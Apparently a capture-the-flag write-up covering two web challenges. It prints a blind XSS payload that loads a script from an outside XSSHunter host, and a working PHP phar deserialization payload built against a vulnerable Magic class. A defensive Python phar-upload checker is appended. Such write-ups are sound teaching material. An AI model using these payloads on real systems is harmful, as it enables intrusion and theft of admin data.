Portal
We are provided with a user registration form, so let's register an account.
After completing the registration and logging in, we get a form with fields for an e-mail address and a text message.
Now, let's submit some random text.
After submission, we got this response:
The message was: "Thank you! Admin will review the message soon." So an admin will review our message, which means we need something to happen at their privilege level as soon as they open it, so that we get the flag. The first thing that came to mind was a blind XSS, so I fired up my XSSHunter and copied a simple payload:
"><script src=https://logan47.xss.ht></script>
I waited for some time and, to my surprise, got a response in my XSSHunter:
In it lies the flag.
Flag: CSACTF{blu3_1s_such_4_l4zy_sys_4dm1n!}
Huzzah
In this challenge, we are provided with a link and the source code of huzzah.php. Opening the link gives something like this:
And the source code of huzzah.php was:
tbh I didn't give much attention to the source code for now. Let's go to the main site: we are provided with file upload functionality, so let's upload something to see what happens. I uploaded a random image and got this result:
Hence the thing we got from this is: the file name must be magic.phar. So it must be related to .phar files.
** As it was worth 400+ points at the time I solved it, I didn't even try to simply rename a file to magic.phar and upload it, you know..... **
Now here's the whole cake. I searched for PHP .phar related exploits and came across this link; it didn't yield anything by itself but gave me an idea of how I could solve this. From that blog post's references I also came across these two links:
1. A Black Hat research paper about PHP & phar
2. https://blog.ripstech.com/2018/new-php-exploitation-technique/
In the Black Hat talk, it was mentioned that there is an unserialization vulnerability. To exploit it, we have to upload a malicious magic.phar file, and upon deserialization I have to get the flag. They showed how someone can exploit this by running code like the following, which creates a phar file:
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

// add an object of any class as metadata
class AnyClass {}
$object = new AnyClass;
$object->data = 'rips';
$phar->setMetadata($object);
$phar->stopBuffering();
Here the source code comes into play: according to it, we have to modify our payload and create our magic.phar.
In the source code:
class Magic {
    function __destruct() {
        $a = $this->data;
        if (strstr($a, ";") !== false or strstr($a, "&") !== false) {
            echo("<p>[-] That's bad, don't do that" . "</p><br>");
        } elseif (strcmp($a, "flag.txt") === 0) {
            echo("<p>[+] Attempting a magic trick!" . "</p><br>");
            include($a);
            //eval($this->data . ";");
        } else {
            echo("<p>[-] You gave bad input - " . $a . "</p><br>");
        }
        system("rm uploads/magic.phar");
    }
}
In the source code there was a class named Magic, so we have to change the class name in our payload and also set $object->data = 'flag.txt';. The final payload I created was something like:
<?php
$phar = new Phar('magic.phar');
$phar->startBuffering();
$phar->addFromString('flag.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
class Magic {}
$object = new Magic;
$object->data = 'flag.txt';
$phar->setMetadata($object);
$phar->stopBuffering();
?>
Now we have to save this code in a PHP file and run it through the PHP interpreter, BUT PHP by default blocks you from creating a phar file from the command line, so simply running php test.php will give an error like:
So I searched for it and found a way to run the interpreter with phar.readonly = off, by running
php -d phar.readonly=0 test.php
We will receive our magic.phar, so let's now upload it. After uploading,
we just have to go to huzzah.php and let the phar do its work: we just have to click on "huzzah" on the main page, as it was the link to huzzah.php.
On that page, we got our flag.
Flag: CSACTF{php_1s_full_0f_m@g1c}
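As an added example that is not part of the original write-up: a Python checker a defender could run over uploads, walking the phar manifest header (layout taken from the PHP phar file-format documentation, assumed here) to pull out the metadata and flag any serialized object, since that is exactly what unserialize() turns into a live Magic instance when the archive is touched through phar://. The sample archive bytes are constructed for the test, not a real magic.phar.

```python
import re
import struct
HALT = b"__HALT_COMPILER();"
OBJ = re.compile(rb'O:(\d+):"')  # start of a serialized PHP object

def phar_metadata(blob: bytes) -> bytes:
    """Return the raw serialized metadata from the phar manifest that follows
    the stub (b"" when the archive carries none)."""
    pos = blob.find(HALT)
    if pos < 0:
        raise ValueError("not a phar: no __HALT_COMPILER(); token")
    pos += len(HALT)
    if blob.startswith(b" ?>", pos):   # PHP emits ' ?>' after the token ...
        pos += 3
    if blob.startswith(b"\r\n", pos):  # ... then an optional newline
        pos += 2
    elif blob.startswith(b"\n", pos):
        pos += 1
    # Manifest header, little-endian: manifest length, file count, 2-byte API
    # version, global flags, alias length, alias, metadata length, metadata.
    _mlen, _nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", blob, pos)
    pos += 18 + alias_len
    (meta_len,) = struct.unpack_from("<I", blob, pos)
    meta = blob[pos + 4:pos + 4 + meta_len]
    if len(meta) != meta_len:
        raise ValueError("truncated phar metadata")
    return meta

def metadata_classes(meta: bytes) -> list:
    """Class names of every serialized object (O:<len>:"Name":) in the metadata.
    unserialize() instantiates each one, so its __wakeup/__destruct will run."""
    names = []
    for m in OBJ.finditer(meta):
        n = int(m.group(1))
        name = meta[m.end():m.end() + n]
        if meta[m.end() + n:m.end() + n + 2] == b'":':
            names.append(name.decode("latin-1"))
    return names

def is_suspicious_upload(blob: bytes) -> bool:
    """True when the upload is a phar whose metadata carries a serialized object."""
    try:
        return bool(metadata_classes(phar_metadata(blob)))
    except (ValueError, struct.error):
        return False

def sample_phar(meta: bytes) -> bytes:
    """Constructed test input: stub plus a manifest with no file entries (not a loadable archive)."""
    body = struct.pack("<IHII", 0, 0x1110, 0, 0) + struct.pack("<I", len(meta)) + meta
    return b"<?php __HALT_COMPILER(); ?>\r\n" + struct.pack("<I", len(body)) + body
```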
Write-up by @logan_47_